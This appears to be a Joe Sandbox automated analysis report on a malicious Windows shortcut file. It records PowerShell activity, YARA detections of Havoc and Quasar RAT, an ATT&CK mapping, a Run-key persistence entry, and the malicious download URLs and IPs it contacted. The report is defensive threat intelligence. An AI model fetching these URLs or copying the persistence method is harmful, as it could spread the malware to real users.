Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\DnsClient\dnslookup.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\netstandard\v4.0_2.0.0.0__cc7b13ffcd2ddd51\netstandard.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Tasks\winver.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Tasks\winver.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
Source: C:\Windows\Tasks\winver.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\Tasks\winver.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation

Source: C:\Windows\Tasks\winver.exe

Code function: 11_2_00007FF63D7CC4F8 GetSystemTimeAsFileTime,

11_2_00007FF63D7CC4F8

Source: C:\Windows\Tasks\winver.exe

Code function: 11_2_00007FF63D7B2D10 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,

11_2_00007FF63D7B2D10

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Havoc

Source: Yara match

File source: C:\Windows\Tasks\cd394167-be4e-4779-8fcd-6d3374e9bfcc, type: DROPPED

Yara detected Quasar RAT

Source: Yara match	File source: 11.2.winver.exe.1f9f3be0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.winver.exe.1f9f3be0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.winver.exe.1f9900100e8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.winver.exe.1f9900100e8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.winver.exe.10957.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.winver.exe.1f9f2ed1997.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.winver.exe.1f9f2ed1997.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2940913887.0000000000280000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2941396332.0000000000320000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2941064855.00000000002B0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2941354870.0000000000310000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2942161728.000001F980001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2943385334.000001F990009000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2942161728.000001F9801D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2949364454.000001F9F38BA000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2950072925.000001F9F3BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2948303433.000001F9F2ED1000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: winver.exe PID: 7284, type: MEMORYSTR

Remote Access Functionality

Yara detected Havoc

Source: Yara match

File source: C:\Windows\Tasks\cd394167-be4e-4779-8fcd-6d3374e9bfcc, type: DROPPED

Yara detected Quasar RAT

Source: Yara match	File source: 11.2.winver.exe.1f9f3be0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.winver.exe.1f9f3be0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.winver.exe.1f9900100e8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.winver.exe.1f9900100e8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.winver.exe.10957.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.winver.exe.1f9f2ed1997.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.winver.exe.1f9f2ed1997.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2940913887.0000000000280000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2941396332.0000000000320000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2941064855.00000000002B0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2941354870.0000000000310000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2942161728.000001F980001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2943385334.000001F990009000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2942161728.000001F9801D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2949364454.000001F9F38BA000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2950072925.000001F9F3BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2948303433.000001F9F2ED1000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: winver.exe PID: 7284, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	Valid Accounts	21 Windows Management Instrumentation	111 Scripting	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	11 Input Capture	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Abuse Elevation Control Mechanism	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	11 Input Capture	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Exploitation for Client Execution	1 Scheduled Task/Job	1 DLL Side-Loading	1 Obfuscated Files or Information	Security Account Manager	36 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Command and Scripting Interpreter	11 Registry Run Keys / Startup Folder	12 Process Injection	1 DLL Side-Loading	NTDS	51 Security Software Discovery	Distributed Component Object Model	Input Capture	113 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 Scheduled Task/Job	Network Logon Script	1 Scheduled Task/Job	121 Masquerading	LSA Secrets	61 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	3 PowerShell	RC Scripts	11 Registry Run Keys / Startup Folder	61 Virtualization/Sandbox Evasion	Cached Domain Credentials	13 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Process Injection	DCSync	11 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Hidden Files and Directories	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
alyemenione.lnk	3%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Windows\Tasks\winver.exe	0%	ReversingLabs

Source	Detection	Scanner	Label
https://cdn-streaming.com/hP3TJdoqvDIYbA3JIxDstAFA	0%	Avira URL Cloud	safe
https://cdn-streaming.com/62rgx9T9MW.pdf	0%	Avira URL Cloud	safe
https://cdn-streaming.com/avatar.jpg	0%	Avira URL Cloud	safe
http://cdn-streaming.com	0%	Avira URL Cloud	safe
cdn-streaming.com	0%	Avira URL Cloud	safe
https://cdn-streaming.com/hP3TJdoqvDIYbA3JIxDstAFAX	0%	Avira URL Cloud	safe
https://cdn-streaming.com	0%	Avira URL Cloud	safe
https://cdn-streaming.com/logo.png	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.214.172	true	false	high
ipwho.is	108.181.61.49	true	false	high
cdn-streaming.com	37.1.223.28	true	true	unknown
x1.i.lencr.org	unknown	unknown	false	high
ebtxghggfv.cdn-streaming.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://cdn-streaming.com/avatar.jpg	true	Avira URL Cloud: safe	unknown
https://cdn-streaming.com/62rgx9T9MW.pdf	true	Avira URL Cloud: safe	unknown
https://cdn-streaming.com/hP3TJdoqvDIYbA3JIxDstAFA	true	Avira URL Cloud: safe	unknown
https://cdn-streaming.com/logo.png	true	Avira URL Cloud: safe	unknown
cdn-streaming.com	true	Avira URL Cloud: safe	unknown
https://ipwho.is/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	winver.exe, 0000000B.00000002.2943385334.000001F990009000.00000004.00000800.00020000.00000000.sdmp, winver.exe, 0000000B.00000002.2941064855.00000000002B0000.00000020.00000001.00020000.00000000.sdmp, winver.exe, 0000000B.00000002.2950072925.000001F9F3BE0000.00000004.08000000.00040000.00000000.sdmp, winver.exe, 0000000B.00000002.2949364454.000001F9F38BA000.00000004.00000001.00020000.00000000.sdmp, winver.exe, 0000000B.00000002.2948303433.000001F9F2ED1000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.autoitscript.com/autoit3/J	winver.exe, 0000000B.00000000.1888510146.00007FF63D885000.00000002.00000001.01000000.00000009.sdmp, winver.exe.1.dr	false		high
http://x1.i.lencr.org/	2D85F72862B55C4EADD9E66E06947F3D0.5.dr	false		high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000001.00000002.1898768989.000001AD59059000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1935692872.000001AD70CD5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/14436606/23354	winver.exe, 0000000B.00000002.2943385334.000001F990009000.00000004.00000800.00020000.00000000.sdmp, winver.exe, 0000000B.00000002.2950072925.000001F9F3BE0000.00000004.08000000.00040000.00000000.sdmp, winver.exe, 0000000B.00000002.2949364454.000001F9F38BA000.00000004.00000001.00020000.00000000.sdmp, winver.exe, 0000000B.00000002.2941120717.00000000002C0000.00000020.00000001.00020000.00000000.sdmp, winver.exe, 0000000B.00000002.2942161728.000001F980046000.00000004.00000800.00020000.00000000.sdmp, winver.exe, 0000000B.00000002.2948303433.000001F9F2ED1000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000001.00000002.1898768989.000001AD58D87000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.datacontract.org/2004/07/	winver.exe, 0000000B.00000002.2942161728.000001F9801D6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.ver)	svchost.exe, 00000006.00000002.2943077828.00000167A7A00000.00000004.00000020.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/ProdV2.C:	edb.log.6.dr	false		high
http://www.autoitscript.com/autoit3/	winver.exe	false		high
https://www.autoitscript.com/autoit3/	powershell.exe, 00000001.00000002.1898768989.000001AD59C8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1898768989.000001AD59CA1000.00000004.00000800.00020000.00000000.sdmp, winver.exe.1.dr	false		high
https://cdn-streaming.com/hP3TJdoqvDIYbA3JIxDstAFAX	powershell.exe, 00000001.00000002.1898768989.000001AD5A0D8000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://g.live.com/odclientsettings/Prod.C:	edb.log.6.dr	false		high
https://g.live.com/odclientsettings/ProdV2	edb.log.6.dr	false		high
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96	svchost.exe, 00000006.00000003.1823538213.00000167A7CC2000.00000004.00000800.00020000.00000000.sdmp, edb.log.6.dr	false		high
https://cdn-streaming.com	powershell.exe, 00000001.00000002.1898768989.000001AD5A0D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1898768989.000001AD59059000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1898768989.000001AD59ADB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1898768989.000001AD59CA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1898768989.000001AD593F8000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cdn-streaming.com	powershell.exe, 00000001.00000002.1898768989.000001AD59ADB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1898768989.000001AD59CA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1898768989.000001AD5A186000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://stackoverflow.com/q/11564914/23354;	winver.exe, 0000000B.00000002.2943385334.000001F990009000.00000004.00000800.00020000.00000000.sdmp, winver.exe, 0000000B.00000002.2950072925.000001F9F3BE0000.00000004.08000000.00040000.00000000.sdmp, winver.exe, 0000000B.00000002.2949364454.000001F9F38BA000.00000004.00000001.00020000.00000000.sdmp, winver.exe, 0000000B.00000002.2941120717.00000000002C0000.00000020.00000001.00020000.00000000.sdmp, winver.exe, 0000000B.00000002.2948303433.000001F9F2ED1000.00000004.00000001.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	winver.exe, 0000000B.00000002.2943385334.000001F990009000.00000004.00000800.00020000.00000000.sdmp, winver.exe, 0000000B.00000002.2941064855.00000000002B0000.00000020.00000001.00020000.00000000.sdmp, winver.exe, 0000000B.00000002.2950072925.000001F9F3BE0000.00000004.08000000.00040000.00000000.sdmp, winver.exe, 0000000B.00000002.2949364454.000001F9F38BA000.00000004.00000001.00020000.00000000.sdmp, winver.exe, 0000000B.00000002.2948303433.000001F9F2ED1000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000001.00000002.1898768989.000001AD58D87000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ipwho.is	winver.exe, 0000000B.00000002.2942161728.000001F98016B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore68	powershell.exe, 00000001.00000002.1898768989.000001AD58B61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.1898768989.000001AD58B61000.00000004.00000800.00020000.00000000.sdmp, winver.exe, 0000000B.00000002.2942161728.000001F980001000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ipwho.is	winver.exe, 0000000B.00000002.2942161728.000001F980185000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6	svchost.exe, 00000006.00000003.1823538213.00000167A7CC2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
108.181.61.49	ipwho.is	Canada		852	ASN852CA	false
37.1.223.28	cdn-streaming.com	Ukraine		58061	SCALAXY-ASNL	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1577962
Start date and time:	2024-12-18 23:05:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 32s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	alyemenione.lnk
Detection:	MAL
Classification:	mal100.troj.expl.evad.winLNK@25/66@7/3
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 75% Number of executed functions: 57 Number of non-executed functions: 91
Cookbook Comments:	Found application associated with file extension: .lnk

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 23.32.238.89, 23.32.238.130, 23.32.238.128, 23.218.208.137, 172.64.41.3, 162.159.61.3, 54.224.241.105, 34.237.241.83, 18.213.11.84, 50.16.47.176, 23.218.208.109, 199.232.214.172, 23.195.61.56, 184.30.20.134, 2.19.198.75, 23.32.238.147, 23.32.238.137, 2.19.198.65, 23.32.238.163, 4.245.163.56, 52.22.41.97, 13.107.246.63
Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, e4578.dscb.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, fs.microsoft.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, ssl.adobe.com.edgekey.net, armmf.adobe.com, geo2.adobe.com
Execution Graph export aborted for target powershell.exe, PID 7352 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: alyemenione.lnk

Simulations

Behavior and APIs

Time	Type	Description
17:05:59	API Interceptor	76x Sleep call for process: powershell.exe modified
17:06:11	API Interceptor	2x Sleep call for process: svchost.exe modified
17:06:22	API Interceptor	2x Sleep call for process: AcroCEF.exe modified
17:07:07	API Interceptor	717x Sleep call for process: winver.exe modified
22:06:18	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OutlookUpdater_1206996950 "C:\Windows\Tasks\winver.exe" cd394167-be4e-4779-8fcd-6d3374e9bfcc
22:06:26	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OutlookUpdater_1206996950 "C:\Windows\Tasks\winver.exe" cd394167-be4e-4779-8fcd-6d3374e9bfcc

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
108.181.61.49	888.exe	Get hash	malicious	Luca Stealer	Browse	/?output=json
	888.exe	Get hash	malicious	Luca Stealer	Browse	/?output=json
	Cracker.exe	Get hash	malicious	Luca Stealer	Browse	/?output=json

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ipwho.is	jignesh.exe	Get hash	malicious	Quasar	Browse	108.181.61.49
	skibidi.exe	Get hash	malicious	Quasar	Browse	108.181.61.49
	vanilla.exe	Get hash	malicious	Quasar	Browse	108.181.61.49
	888.exe	Get hash	malicious	Luca Stealer	Browse	108.181.61.49
	888.exe	Get hash	malicious	Luca Stealer	Browse	108.181.61.49
	https://aggttt.z4.web.core.windows.net/?bcda=00-1-234-294-2156	Get hash	malicious	TechSupportScam	Browse	108.181.61.49
	Loader.exe	Get hash	malicious	Quasar	Browse	108.181.61.49
	Hydra.ccLoader.bat	Get hash	malicious	Unknown	Browse	108.181.61.49
	full.exe	Get hash	malicious	Quasar	Browse	108.181.61.49
	https://gvvc18-secondary.z15.web.core.windows.net/werrx01USAHTML/?bcda=1-844-439-9938	Get hash	malicious	TechSupportScam	Browse	108.181.61.49
bg.microsoft.map.fastly.net	R8CAg00Db8.lnk	Get hash	malicious	Unknown	Browse	199.232.214.172
	A file has been sent to you via DROPBOX.pdf	Get hash	malicious	Unknown	Browse	199.232.210.172
	PyIsvSahWy.exe	Get hash	malicious	Unknown	Browse	199.232.210.172
	PkContent.exe	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://launch.app/plainsart	Get hash	malicious	HTMLPhisher	Browse	199.232.214.172
	ji2xlo1f.exe	Get hash	malicious	LummaC	Browse	199.232.210.172
	Order_948575494759.xls	Get hash	malicious	Unknown	Browse	199.232.214.172
	DocuStream_Scan_l8obgs3v.pdf	Get hash	malicious	HTMLPhisher	Browse	199.232.214.172
	stail.exe.3.exe	Get hash	malicious	Socks5Systemz	Browse	199.232.214.172
	22TxDBB1.bat	Get hash	malicious	Unknown	Browse	199.232.214.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ASN852CA	mips.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	204.191.146.80
	la.bot.mips.elf	Get hash	malicious	Mirai	Browse	161.184.58.16
	la.bot.sh4.elf	Get hash	malicious	Mirai	Browse	199.175.174.49
	powerpc.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	207.6.190.148
	la.bot.mipsel.elf	Get hash	malicious	Mirai	Browse	173.182.147.38
	arm5.nn-20241218-1651.elf	Get hash	malicious	Mirai, Okiru	Browse	172.218.204.155
	z68scancopy.vbs	Get hash	malicious	FormBook	Browse	108.181.20.35
	loligang.mpsl.elf	Get hash	malicious	Mirai	Browse	207.34.214.194
	loligang.mips.elf	Get hash	malicious	Mirai	Browse	142.101.249.54
	sh4.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	23.17.23.190
SCALAXY-ASNL	Fuji Xerox ENCLOSED - Revised DRAFT.pdf	Get hash	malicious	Unknown	Browse	37.252.15.57
	ACUN4Da4d7.exe	Get hash	malicious	Unknown	Browse	37.1.201.146
	payload_1.ps1	Get hash	malicious	Unknown	Browse	5.61.59.53
	payload_1.ps1	Get hash	malicious	Unknown	Browse	5.61.59.53
	payload_1.ps1	Get hash	malicious	Unknown	Browse	5.61.59.53
	http://ads.livetv799.me	Get hash	malicious	Unknown	Browse	5.61.52.174
